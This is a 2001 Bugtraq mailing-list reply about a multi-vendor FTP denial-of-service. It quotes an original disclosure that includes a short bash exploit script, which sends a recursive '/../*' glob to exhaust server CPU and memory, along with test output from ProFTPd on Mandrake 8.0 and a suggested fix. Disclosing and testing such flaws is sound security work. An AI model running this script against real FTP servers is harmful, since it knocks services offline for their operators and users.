Bugtraq mailing list archives
Re: Multiple-Vendor-FTP-Vuln. (old?)
From: Dmitriy Kropivnitskiy <dkropivnitskiy () tigertesting com>
Date: Tue, 21 Aug 2001 10:46:39 -0400
Tested on Mandrake 8.0. ProFTPd version is proftpd-1.2.2-0.rc1.3mdk. Here are results: Remote system type is UNIX. Using binary mode to transfer files. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. 226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* Transfer complete. 226 Quotas off ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. 226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* Transfer complete. 226 Quotas off ftp> quit 221 Goodbye. [root@system user]# ps aux | grep ftp nobody 3773 0.0 0.4 2152 1052 ? S 10:44 0:00 proftpd (acceptin On Mon, Aug 20, 2001 at 03:20:35PM +0200, Enrico Kern wrote:
Hi, i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = many new Linux-Dist.. When a user logged in in ftp and type the ls command the in.ftpd takes over 90 percent cpu-usage and execute = the command 2 or 3x than the full system hang up. it also works in = console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = in march 01, but it still works so i post it again. affected: RedHat Linux 7.x Linux Mandrake 8.0 SuSE Linux 7.2 FreeBSD 4.3 AiX V 4.3 other? Not vuln.: latest Wu-Ftpd Windows FTP-Server Exploit: #!/bin/bash=20 ftp -n FTP-SERVER<<\end=20 quot user anonymous bin quot pass shitold () bug com ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 Fix: set cpu-limit for your anonymous user. ------------------------- Enrico Kern www.h07.org _______________________________________________________________________ 1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de IhrName () web de, 8MB Speicher, Verschluesselung - http://freemail.web.de
Current thread:
- Multiple-Vendor-FTP-Vuln. (old?) Enrico Kern (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) jeev (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Scott Dier (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Mike Jakubik (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Bernhard Rosenkraenzer (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Roman Drahtmueller (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Dmitriy Kropivnitskiy (Aug 21)
- <Possible follow-ups>
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Robert van der Meulen (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) E. van Elk (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Michael Bellears (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)